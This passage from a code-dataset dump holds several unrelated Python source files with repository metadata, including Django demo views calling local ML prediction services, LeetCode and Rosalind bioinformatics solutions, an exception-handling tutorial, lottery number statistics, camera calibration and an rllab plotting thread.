request.FILES.get(\"myfile\")\n timestr = datetime.today().isoformat()\n fs = FileSystemStorage(location='media/image_input_for_music/' + timestr)\n filename = fs.save(myfile.name, myfile)\n # uploaded_file_url = fs.url(filename)\n\n file_input = os.path.join(\"media/image_input_for_music/\" + timestr, filename)\n # file_output = os.pa`````````````````` h7th.join(\"media/image_as_output/\", filename)\n\n url = 'http://192.168.75.13:5003/process'\n files = {'file': open(file_input, 'rb')}\n Picture_request = requests.post(url, files=files)\n if Picture_request.status_code == 200:\n music_out = Picture_request.json()\n image_byte_data = music_out[\"ImageBytes\"]\n recommended_songs = music_out[\"Songs\"]\n # y = json.loads(recommended_songs)\n\n import PIL.Image as Image\n import io\n b = 
base64.b64decode(image_byte_data)\n img = Image.open(io.BytesIO(b))\n img.save(open(\"media/image_output_for_music/\" + timestr + filename, \"wb\"))\n\n # file = open(\"media/image_output_for_music/\" + timestr + filename, \"wb\")\n # file.write(Picture_request.content)\n # file.close()\n file_loc1 = \"media/image_output_for_music/\" + timestr + filename\n\n # number_plate = NumberPlateHistory.objects.create(num_name=filename, num_image_input=file_input,\n # num_image_output=file_loc1)\n # number_plate.save()\n with open(file_loc1, \"rb\") as img_file:\n image_data = base64.b64encode(img_file.read()).decode('utf-8')\n uploaded_file = dict()\n uploaded_file[\"image\"] = image_data\n uploaded_file = uploaded_file[\"image\"]\n\n else:\n messages.info(request, \"API Not Connected\")\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n return render(request=request, template_name='main/music_image_upload.html',\n context={'uploaded_file': uploaded_file, 'recommended_songs': recommended_songs\n })\n\n else:\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n except:\n messages.info(request, \"Please Check Upload data\")\n return render(request=request,\n template_name='main/music_image_upload.html')\n\n\ndef driver_drowsiness(request):\n return render(request=request,\n template_name='main/driver_drowsiness.html')\n\n\ndef video_feed(request):\n return StreamingHttpResponse(gen(VideoCamera()),\n content_type='multipart/x-mixed-replace; boundary=frame')\n\n\ndef bigsale(request):\n if request.method == 'POST':\n item_weight = float(request.POST['item_weight'])\n item_fat_content = float(request.POST['item_fat_content'])\n item_visibility = float(request.POST['item_visibility'])\n item_type = float(request.POST['item_type'])\n item_mrp = float(request.POST['item_mrp'])\n outlet_establishment_year = float(request.POST['outlet_establishment_year'])\n outlet_size = float(request.POST['outlet_size'])\n outlet_location_type = float(request.POST['outlet_location_type'])\n outlet_type = float(request.POST['outlet_type'])\n\n import requests\n res1 = requests.post(\"http://127.0.0.1:9457/predict\",\n data={'item_weight': item_weight, 'item_fat_content': item_fat_content,\n 'item_visibility': item_visibility,\n 'item_type': item_type, 'item_mrp': item_mrp,\n 'outlet_establishment_year': outlet_establishment_year,\n 'outlet_size': outlet_size, 'outlet_location_type': outlet_location_type,\n 'outlet_type': outlet_type})\n\n # print(res1)\n\n if res1.status_code == 200:\n res_sale1 = dict()\n res_sale1[\"pred\"] = res1.text\n res_sale = res_sale1[\"pred\"]\n\n # return render(request=request, template_name='main/photo_coloring.html',\n # context={'uploaded_file': uploaded_file})\n return render(request=request, template_name='main/bigsale.html', context={'res_sale': res_sale})\n\n return render(request=request, template_name='main/bigsale.html')\n\n # x = [quarter, mode, purpose, year, duration, country, spends, 0.38]\n # global res\n # res = logic_layer(x)\n # return redirect(\"/predict\")\n # else:\n # problem = form.errors.as_data()\n # # This section is used to handle invalid data\n # messages.error(request, list(list(problem.values())[0][0])[0])\n # form = TourismForm()\n # form = TourismForm()\n # return render(request=request, template_name='main/index2.html', context={\"form\": form})\n return render(request=request, template_name='main/bigsale.html')\n\n\ndef index2(request):\n if request.method == 'POST':\n form = 
TourismForm(request.POST)\n\n if form.is_valid():\n\n year = form.cleaned_data['year']\n duration = form.cleaned_data['duration']\n spends = form.cleaned_data['spends'] / 1000\n mode = int(form.cleaned_data['mode'])\n purpose = int(form.cleaned_data['purpose'])\n quarter = int(form.cleaned_data['quarter'])\n country = int(form.cleaned_data['country'])\n\n x = [quarter, mode, purpose, year, duration, country, spends, 0.38]\n global res\n res = logic_layer(x)\n return redirect(\"/predict\")\n else:\n problem = form.errors.as_data()\n # This section is used to handle invalid data \n messages.error(request, list(list(problem.values())[0][0])[0])\n form = TourismForm()\n form = TourismForm()\n return render(request=request, template_name='main/index2.html', context={\"form\": form})\n\n\ndef about(request):\n return render(request=request,\n template_name=\"main/about.html\")\n\n\ndef under_construction(request):\n messages.info(request, \"This page coming soon..\")\n return render(request=request,\n template_name=\"main/under_construction.html\")\n","repo_name":"abhishekshingadiya/AI-ML-demo","sub_path":"web-demo/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34705374999","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n stack = []\n path = path.split('/')\n\n for item in path:\n\n if item == '.' or item == '':\n continue\n elif item == '..':\n if stack:\n stack.pop()\n else:\n stack.append(item)\n\n res = '/'.join(stack)\n res = '/' + res\n return res\n","repo_name":"otthqs/Fun_Leetcode","sub_path":"Solutions/leetcode71_Simplify_Path.py","file_name":"leetcode71_Simplify_Path.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"12806926937","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUso básico de Excepción\n\"\"\"\nimport sys\n\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\"\"\"\nExcepciones Encadenadas\n\"\"\"\ntry:\n f = open(\"test.txt\", encoding='utf-8')\n # perform file operations\nexcept:\n print(\"Fallo al abrir\")\nfinally:\n try:\n f.close()\n except Exception as e:\n print(\"No se ha podido cerrar, porque no estaba abierto\")\n print(\"Error:\" + str(e))\n\"\"\"\nCaptura de excepción ValueError\n\"\"\"\nwhile True:\n try:\n n = input(\"Please enter an integer: \")\n n = int(n)\n break\n except ValueError:\n print(\"No valid integer! 
Please try again ...\")\n finally:\n print(\"Se ejecutaras siempre\")\nprint(\"Great, you successfully entered an integer!\")\n\"\"\"\nUso de Else \n\"\"\"\ntry:\n fh = open(\"testfile\", \"w\")\n fh.write(\"This is my test file for exception handling!!\")\nexcept IOError:\n print(\"Error: can\\'t find file or read data\")\nelse:\n print(\"Written content in the file successfully\")\n fh.close()\n\"\"\"\nUso de Finally\n\"\"\"\ntry:\n x = float(input(\"Your number: \"))\n print(x)\n inverse = 1.0 / x\n\nexcept ValueError:\n print(\"You should have given either an int or a float\")\nexcept ZeroDivisionError:\n print(\"Infinity\")\nfinally:\n print(\"There may or may not have been an exception.\")\n\n\"\"\"\nElevar una excepción\n\"\"\"\nimport sys\n\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\"\"\"\nAcceso a parámetros de excepción\n\"\"\"\ntry:\n raise Exception('spam', 'eggs')\nexcept Exception as inst:\n print(type(inst)) # the exception instance\n print(inst.args) # arguments stored in .args\n print(inst) # __str__ allows args to be printed directly,\n # but may be overridden in exception subclasses\n x, y = inst.args # unpack args\n print('x =', x)\n print('y =', y)\n\n\"\"\"\nExcepciones personalizadas\n\"\"\"\n\n\nclass B(Exception):\n pass\n\n\nclass C(B):\n pass\n\n\nclass D(C):\n pass\n\n\nfor cls in [B, C, D]:\n try:\n raise cls()\n except D:\n print(\"D\")\n except C:\n print(\"C\")\n except B:\n print(\"B\")\n\"\"\"\nExcepciones personalizadas más completo\n\"\"\"\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\n\nclass InputError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass TransitionError(Error):\n \"\"\"Raised when an operation attempts a state transition that's not\n allowed.\n\n Attributes:\n previous -- state at beginning of transition\n next -- attempted new state\n message -- explanation of why the specific transition is not allowed\n \"\"\"\n\n def __init__(self, previous, next, message):\n self.previous = previous\n self.next = next\n self.message = message\n\n\nclass HTTPExcepcion(Exception):\n\n def __init__(self, mensaje='HTTPERROR: ', status='400', url='telecable.es'):\n self.mensaje = mensaje\n self.status = status\n self.url = url\n\n def __str__(self):\n return self.mensaje\n\n\ntry:\n raise HTTPExcepcion(\"HTTPERROR: el servidor no responde\", '500', \"cursosdedesarrollo.com\")\nexcept HTTPExcepcion as e:\n print(e)\n print(e.mensaje)\n print(e.url)\n print(e.status)\n","repo_name":"pepesan/ejemplos-python","sub_path":"excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25815818080","text":"\"\"\"\n- bottom up dynamic programming\n- dp[i] represents the number of arithmetic slices in range (k, i),\n - k is the starting index that chain starts\n - dp[0] = 0\n - dp[1] = 0\n - dp[2] = ?\n - dp[2] = 1 if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]\n - dp[3]\n - if nums[i] - nums[i - 1] == nums[i - 1] 
- nums[i - 2]\n - dp[3] = 1 (length: 3) + dp[2] (length: 3) + 1 (length: 4)\n - How can I add extra one\n- return sum(dp)\n\"\"\"\n\n\nfrom typing import List\n\n\n# class Solution:\n# def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n# dp = [0] * len(nums)\n#\n# for i in range(2, len(nums)):\n# if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]:\n# dp[i] = 1 + dp[i - 1] + dp[i]\n#\n# # print(f'dp: {dp}')\n#\n# # return dp[-1]\n# return sum(dp)\n\n\n\"\"\"\nConstant space\n\"\"\"\n\n\nclass Solution:\n def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n dp = 0\n sum = 0\n for i in range(2, len(nums)):\n if nums[i] - nums[i - 1] == nums[i - 1] - nums[i - 2]:\n dp = 1 + dp\n sum += dp\n # Reset\n else:\n dp = 0\n\n return sum\n\n\nnums = [1,2,3,4]\n# nums = [1]\n# nums = [1, 2, 3, 4, 5] # 6\nprint(Solution().numberOfArithmeticSlices(nums))\n\n","repo_name":"yukikitayama/leetcode-python","sub_path":"study-plan/dynamic-programming-i/dp_413_arithmetic_slices_4.py","file_name":"dp_413_arithmetic_slices_4.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"33459958799","text":"from . import SpeechListenerBase\n\nclass VoiceRequestListener(SpeechListenerBase):\n def __init__(self, api_key: str, volume_threshold: int=3000, timeout: float=1.0, detection_timeout: float=10.0, min_duration: float=0.3, max_duration: float=20.0, lang: str=\"ja-JP\", rate: int=44100, channels: int=1, device_index: int=-1):\n super().__init__(api_key, self.on_request, volume_threshold, timeout, detection_timeout, min_duration, max_duration, lang, rate, channels, device_index)\n self.last_recognized_text = None\n\n async def on_request(self, text: str):\n self.last_recognized_text = text\n self.stop_listening()\n\n async def get_request(self):\n await self.start_listening()\n resp = self.last_recognized_text\n self.last_recognized_text = None\n return resp\n","repo_name":"uezo/aiavatarkit","sub_path":"aiavatar/listeners/voicerequest.py","file_name":"voicerequest.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"43"} +{"seq_id":"32499564121","text":"# import vendas.calc_precos\n# from vendas import calc_precos\n\nfrom vendas.calc_precos import aumento, reducao\n# from vendas.formata.preco import real\n\npreco_original = 49.90\n# preco_com_aumento = calc_precos.aumento(preco, 15)\n# preco_com_aumento = vendas.calc_precos.aumento(preco, 15)\npreco_com_aumento = aumento(valor=preco_original, porcentagem=15, formata=True)\npreco_com_reducao = reducao(valor=preco_original, porcentagem=15, formata=True)\nprint(preco_com_aumento)\nprint(preco_com_reducao)\n","repo_name":"filipehlreis/cursopython","sub_path":"sessao3_pythonIntermediario/aula88_comocriarpacote/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11841617659","text":"\"\"\"\nNAME: Inferring mRNA from Protein (Bioinformatics Stronghold)\nCONTRIBUTOR: Aakash Sudhakar\n\nPROBLEM: For positive integers a and n, a modulo n (written a mod n in shorthand) \n is the remainder when a is divided by n. For example, 29 mod 11 = 7 \n because 29 = 11 × 2 + 7.\n\n Modular arithmetic is the study of addition, subtraction, multiplication, \n and division with respect to the modulo operation. 
We say that a and b \n are congruent modulo n if a mod n = b mod n; in this case, we use the \n notation a ≡ b mod n.\n\n Two useful facts in modular arithmetic are that if a ≡ b mod n and \n c ≡ d mod n, then a + c ≡ b + d mod n and a × c ≡ b × d mod n. \n To check your understanding of these rules, you may wish to verify \n these relationships for a = 29, b = 73, c = 10, d = 32, and n = 11.\n\n As you will see in this exercise, some Rosalind problems will ask for \n a (very large) integer solution modulo a smaller number to avoid the \n computational pitfalls that arise with storing such large numbers.\n\nDATASET: A protein string of length at most 1000 aa.\n\nOUTPUT: The total number of different RNA strings from which the protein \n could have been translated, modulo 1,000,000. \n (Don't neglect the importance of the stop codon in protein translation.)\n\nSAMPLE DATASET: MA\nSAMPLE OUTPUT: 12\n\nSTATUS: Submission successful.\n\"\"\"\n\ndef _codon_dictogram_constructor():\n \"\"\" Constructs frequency table for amino-acid-to-protein conversions. \"\"\"\n codon_dictogram, CODON_TRANSLATION_TABLE = dict(), {\n \"UUU\": \"F\", \"CUU\": \"L\", \"AUU\": \"I\", \"GUU\": \"V\",\n \"UUC\": \"F\", \"CUC\": \"L\", \"AUC\": \"I\", \"GUC\": \"V\",\n \"UUA\": \"L\", \"CUA\": \"L\", \"AUA\": \"I\", \"GUA\": \"V\",\n \"UUG\": \"L\", \"CUG\": \"L\", \"AUG\": \"M\", \"GUG\": \"V\",\n \"UCU\": \"S\", \"CCU\": \"P\", \"ACU\": \"T\", \"GCU\": \"A\",\n \"UCC\": \"S\", \"CCC\": \"P\", \"ACC\": \"T\", \"GCC\": \"A\",\n \"UCA\": \"S\", \"CCA\": \"P\", \"ACA\": \"T\", \"GCA\": \"A\",\n \"UCG\": \"S\", \"CCG\": \"P\", \"ACG\": \"T\", \"GCG\": \"A\",\n \"UAU\": \"Y\", \"CAU\": \"H\", \"AAU\": \"N\", \"GAU\": \"D\",\n \"UAC\": \"Y\", \"CAC\": \"H\", \"AAC\": \"N\", \"GAC\": \"D\",\n \"UAA\": \"Stop\", \"CAA\": \"Q\", \"AAA\": \"K\", \"GAA\": \"E\",\n \"UAG\": \"Stop\", \"CAG\": \"Q\", \"AAG\": \"K\", \"GAG\": \"E\",\n \"UGU\": \"C\", \"CGU\": \"R\", \"AGU\": \"S\", \"GGU\": \"G\",\n \"UGC\": \"C\", \"CGC\": \"R\", \"AGC\": \"S\", \"GGC\": \"G\",\n \"UGA\": \"Stop\", \"CGA\": \"R\", \"AGA\": \"R\", \"GGA\": \"G\",\n \"UGG\": \"W\", \"CGG\": \"R\", \"AGG\": \"R\", \"GGG\": \"G\"\n }\n for _, amino_acid in CODON_TRANSLATION_TABLE.items():\n if amino_acid not in codon_dictogram:\n codon_dictogram[amino_acid] = 0\n codon_dictogram[amino_acid] += 1\n return codon_dictogram\n\ndef sequence_variations_calculator(protein_chain):\n \"\"\" Calculates all possible amino acid variations to generate input protein chain. 
\"\"\"\n CODON_FREQS, N = _codon_dictogram_constructor(), 1000000\n possible_variations = CODON_FREQS[\"Stop\"]\n for amino_acid in protein_chain:\n possible_variations *= CODON_FREQS[amino_acid]\n return possible_variations % N\n\ndef main():\n # NOTE: Requires being in parent repo ('pwd' must return up to directory '/Rosalind_Bioinformatics/Bioinformatics_Stronghold')\n FILEPATHREAD = \"./datasets/P17_MRNA-dataset.txt\"\n FILEPATHWRITE = \"./outputs/P17_MRNA-output.txt\"\n\n # Reads text data from raw dataset as single-line array of characters\n with open(FILEPATHREAD, \"r\") as fr:\n data = fr.read().strip()\n\n # Calculates total sequence variations constructed from possible RNA combinations\n sequence_variations = sequence_variations_calculator(data)\n\n # Creates output file and writes appropriate response to file and notifies user\n with open(FILEPATHWRITE, \"w\") as fw:\n fw.write(str(sequence_variations))\n\n return print(\"\\nThe Protein-to-mRNA dataset has been processed and the appropriate output has been saved to {}.\\n\".format(FILEPATHWRITE[2:]))\n\nif __name__ == \"__main__\":\n main()","repo_name":"djprofessorkash/Rosalind_Bioinformatics","sub_path":"Bioinformatics_Stronghold/programs/P17_MRNA.py","file_name":"P17_MRNA.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25079158768","text":"from django.urls import path \nfrom . import views\nurlpatterns = [\n path('', views.index),\n path('add',views.add),\n path('author',views.author),\n path('authoradd',views.authoradd),\n path('author/', views.authordata, name='authordata'),\n path('Book/', views.bookdata, name='bookdata'),\n path('author/addbook',views.addbook ),\n path('Book/addauthor',views.addauthor) \n]\n","repo_name":"Hassano1696/Axsos-Academy","sub_path":"python_stack/django/django_orm/books_authors/books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14126431033","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\n#解决中文显示问题\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\nimport pandas as pd\nimport pickle\nimport numpy as np\nfrom collections import Counter\n\ncountdx = [] #统计大小号\nnumb = 0 #蓝球号码\nlanqiu = [] #蓝球列表\ncount = []\nposition = []\nsame = 0 #相同次数\ncountlg = [] #大小号间隔\n\n\n#以DataFrame格式读���全部数据\nwith open('dfall.txt', 'rb') as t:\n DFall = pickle.load(t)\nlanqiu = list(DFall['blue'])\nlength = len(lanqiu)\n\n#蓝球最近50次统计\ndef count50(mylist):\n plt.title('蓝球最近50次统计')\n cou = []\n for i in range(1,17):\n cou += [mylist[:50].count(i)]\n return cou\n\n\n#统计蓝球大小号\ndef dxcount(mylist):\n plt.title('统计蓝球大小号')\n dxco = []\n for j in mylist:\n if j >8:\n dxco += [1]\n else :\n dxco += [2]\n return dxco\n\n#统计大小号间隔\ndef lgcount(mylist):\n plt.title('统计大小号间隔')\n lgco = []\n for i in range(1,len(mylist)):\n if mylist[i] == mylist[i-1]:\n same += 1\n else :\n lgco += [same]\n same = 0\n return lgco\n \n#统计n#蓝球出现间隔\ndef countjgn(n):\n st = '统计%d号蓝球出现间隔'%(n)\n plt.title(st)\n p1 = 0\n p2 = 0\n count1 = []\n po = []\n while True:\n try:\n p1 = lanqiu[p2:].index(n)+1\n p2 += p1\n count1 += [p1]\n \n except ValueError:\n break\n res = dict(Counter(count1))\n result = sorted(res)\n for j in range(len(result)):\n k = result[j]\n po += [res[k]]\n\n return result,po\n\n\n\n#显示大小号间隔\n#position = 
countlg[:100]\n#plt.bar(range(len(position)),position , align='center')\n\n\n\n#统计各蓝球间隔超过n期次数,50期不出现概率3.97%\ndef countdayu(n):\n plt.title('统计各蓝球间隔超过%d期次数'%(n))\n po = []\n for i in range(1,17):\n p2 = 0\n p3 = 0\n count50 = 0\n \n while True:\n try:\n p1 = lanqiu[p3:].index(i)+1\n if p1 > n:\n count50 += 1\n p3 += p1\n if p1 > p2:\n p1,p2 = p2,p1\n \n except ValueError:\n po += [count50]\n break\n return po\n\n\n \n\n#统计各蓝球出现最长间隔\ndef countjgmax():\n plt.title('统计各蓝球出现最长间隔')\n po = []\n for i in range(1,17):\n p2 = 0\n p3 = 0\n\n while True:\n try:\n p1 = lanqiu[p3:].index(i)+1\n p3 += p1\n if p1 > p2:\n p1,p2 = p2,p1\n \n except ValueError:\n po += [p2]\n break\n return po\n\n\n\n#蓝球最近出现时间统计\ndef zuijin():\n po = []\n plt.title('蓝球最近出现时间统计')\n for i in range(1,17):\n p1 = lanqiu[0:].index(i)+1\n po += [p1]\n return po\n\n\nresult,position = countjgn(11)\n\npmax = position.index(max(position))+1\n\nplt.bar(range(len(result)),position , align='center')\nplt.xticks(range(len(result)), result)\n\n#绘制柱状图\n#plt.bar(range(1,17),position,)\nplt.bar(pmax-1,position[pmax-1],color =['r'])\n\n# 在柱状图上显示具体数值, ha参数控制水平对齐方式, va控制垂直对齐方式\nfor x, y in enumerate(position):\n plt.text(x, y , '%s' % y, ha='center', va='bottom')\n \n#设置x轴\n#new_ticks = np.linspace(1, 16, 16)\n#plt.xticks(new_ticks)\n\n# 为两条坐标轴设置名\nplt.xlabel(\"间隔距离\")\nplt.ylabel(\"出现次数\")\n\n# 添加标题\n#plt.title('13#蓝球间隔次数统计')\n\nplt.show() \n\n","repo_name":"cikerli/ciker_li","sub_path":"ssq.py","file_name":"ssq.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1567402067","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Written by Rui Xu, Oct. 2017\n# Email: ruix@princeton.edu\nimport sys\nimport time\nimport disp\nimport utils\nimport logging \nimport argparse\nimport numpy as np\nfrom scipy import interp\nfrom scipy.optimize import root\n__author__ = 'ruix'\n\ndef main(args):\n \"\"\" parse command line arguments\"\"\"\n tstart = time.clock()\n if not args.log :\n logging.basicConfig(level=args.loglevel or logging.INFO)\n else:\n logging.basicConfig(filename='log', filemode='w', level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n \"\"\" read plasma parameters \"\"\"\n param = utils.read_param(args)\n \n \"\"\" iterate through wavenumber \"\"\"\n dk = (param['kend'][0]-param['kstart'][0])/param['ksteps'][0]\n fzeta = np.empty(int(param['ksteps'][0]),dtype=complex)\n wave_k = np.empty(int(param['ksteps'][0]))\n zeta_guess = complex(param['omega_r'][0],param['omega_i'][0]) \n\n # eigen value and polaization iEx/Ey*(omega_r/abs(omega_r))\n val = []\n pol = []\n\n for n in range(int(param['ksteps'][0])):\n logger.info('%d th iteration in %d ksteps \\n' ,n,param['ksteps'][0])\n wave_k[n] = param['kstart'][0]+n*dk\n\n \"\"\" find dispersion relation root \"\"\"\n data = (args, param, wave_k[n])\n try:\n # use parallel dsp if theta<0.1 degree\n if (abs(param['theta'][0])<1.):\n sol = root(disp.det_para,(zeta_guess.real,zeta_guess.imag), \\\n args=data,method='hybr',tol=param['sol_err'][0]) \n fzeta[n] = complex(sol.x[0],sol.x[1])\n else:\n sol = root(disp.det,(zeta_guess.real,zeta_guess.imag), \\\n args=data,method='hybr',tol=param['sol_err'][0]) \n fzeta[n] = complex(sol.x[0],sol.x[1])\n logger.info(\"solution: k*di=%1.2e , omega/Omega_ci=%1.2e+%1.2ei\\n\",wave_k[n],fzeta[n].real, fzeta[n].imag)\n if (param['cal_pol'][0]):\n import pol as p\n val0,pol0 = p.pol(args,param,wave_k[n],fzeta[n])\n val.append(val0)\n 
pol.append(pol0)\n if (fzeta[n].imag<0):\n param['exp'][0] = 0\n except ValueError:\n logger.info('ERROR in root finding: wave_k =%f',wave_k[n])\n\n \"\"\" extrapolate previous solutions for next guess \"\"\"\n if(n>3 and n int:\r\n '配列Aの中のうち、k未満の個数と終わりの0indexを返すライブラリ'\r\n '-1の時は解が無い時'\r\n ans = bisect_left(A, K)\r\n return ans, (-1 if ans == 0 else ans - 1)\r\n\r\nfor _ in range(N):\r\n a = int(input())\r\n k, ind = LessThan(a, num_list)\r\n if k == 0:\r\n num_list.insert(0, a)\r\n else:\r\n num_list[ind] = a\r\nprint(len(num_list))\r\n\r\n ","repo_name":"susami-jpg/AtCoder","sub_path":"ABC/ABC134/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34573048399","text":"import cv2\nimport numpy as np\n\n\nclass Camera:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def calibrate(self, files, grid, draw_corners=False):\n obj_points = [] # 3d point in real world space\n img_points = [] # 2d points in image plane.\n output = []\n \n grid_points = np.zeros((grid[0]*grid[1], 3), np.float32)\n grid_points[:,:2] = np.mgrid[0:grid[0],0:grid[1]].T.reshape(-1, 2)\n\n for filename in files:\n # Find the chess board corners\n img = cv2.imread(filename)\n ret, corners = cv2.findChessboardCorners(img, grid, None)\n\n # If found, add object points, image points (after refining them)\n if not ret:\n continue\n\n obj_points.append(grid_points)\n img_points.append(corners)\n\n # Draw and display the corners\n if draw_corners:\n img = cv2.drawChessboardCorners(img, grid, corners, ret)\n output.append({ \"filename\": filename, \"img\": img })\n\n # Undistort\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, (self.width, self.height), None, None)\n new_mtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (self.width, self.height), 1, (self.width, self.height))\n\n self.mtx = mtx\n self.dist = dist\n self.new_mtx = new_mtx\n self.roi = roi\n\n return output\n \n def undistort(self, img):\n return cv2.undistort(img, self.mtx, self.dist, None, self.new_mtx)\n \n def redistort(self, img):\n return cv2.undistort(img, self.new_mtx, self.dist, None, self.mtx)\n","repo_name":"gutnar/cleveron-exercise","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"27739458572","text":"from django.db import models\n\n# Create your models here.\nclass Suscripto(models.Model):\n full_name=models.CharField(max_length=100, verbose_name=\"Nombre completo\")\n email=models.EmailField(verbose_name=\"Correo\")\n\nclass Suscripto2(models.Model):\n nombre=models.CharField(max_length=100)\n email=models.EmailField(max_length=30)\n\n####\nfrom django.contrib.auth.models import User\n###\nSTATUS = (\n (0,\"Draft\"),\n (1,\"Publish\")\n)\nclass Post(models.Model):\n titulo=models.CharField(max_length=200, unique=True)\n slug=models.SlugField(max_length=200, unique=True)\n autor=models.ForeignKey(User, on_delete=models.CASCADE,related_name='blog_posts')\n actualizado_el=models.DateTimeField(auto_now=True)\n contenido=models.TextField()\n\n creado_el=models.DateTimeField(auto_now_add=True)\n status=models.IntegerField(choices=STATUS, default=0)\n class Meta:\n ordering=['-creado_el']\n\n def __str__(self):\n return 
self.titulo\n\n\n","repo_name":"nicolasgeronimorodi/BasicoDjangoBlog","sub_path":"BlogApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9511956700","text":"import atexit\nfrom queue import Empty, Queue\nfrom threading import Thread\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rllab.sampler.utils import rollout\n\n\n\n\n__all__ = ['init_plot', 'update_plot']\n\nthread = None\nqueue = None\n\n\nclass PlotterThread(Thread):\n def __init__(self, queue, sess):\n super(PlotterThread, self).__init__()\n self.queue = queue\n self.sess = sess\n\n def run(self):\n env = None\n policy = None\n max_length = None\n while True:\n msgs = {}\n # Only fetch the last message of each type\n with self.sess.as_default():\n with self.sess.graph.as_default():\n while True:\n try:\n msg = self.queue.get_nowait()\n msgs[msg[0]] = msg[1:]\n except Empty:\n break\n if 'stop' in msgs:\n break\n elif 'update' in msgs:\n env, policy = msgs['update']\n # env.start_viewer()\n elif 'demo' in msgs:\n param_values, max_length = msgs['demo']\n policy.set_param_values(param_values)\n if not self.sess._closed:\n rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)\n else:\n if max_length:\n if not self.sess._closed:\n rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)\n\n\ndef _shutdown_worker():\n if thread:\n queue.put(['stop'])\n queue.task_done()\n queue.join()\n thread.join()\n\n\ndef _init_worker(**kwargs):\n global queue, thread\n if queue is None:\n queue = Queue()\n if 'sess' in kwargs:\n sess = kwargs.get('sess')\n if sess is None:\n sess = tf.get_default_session()\n else:\n sess = tf.get_default_session()\n thread = PlotterThread(queue, sess)\n thread.daemon = True\n thread.start()\n atexit.register(_shutdown_worker)\n\n\ndef init_plot(env, policy, **kwargs):\n _init_worker(**kwargs)\n queue.put(['update', env, policy])\n queue.task_done()\n\n\ndef update_plot(policy, max_length=np.inf):\n queue.put(['demo', policy.get_param_values(), max_length])\n queue.task_done()\n","repo_name":"raymoss/rllab","sub_path":"sandbox/rocky/tf/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"14881449591","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
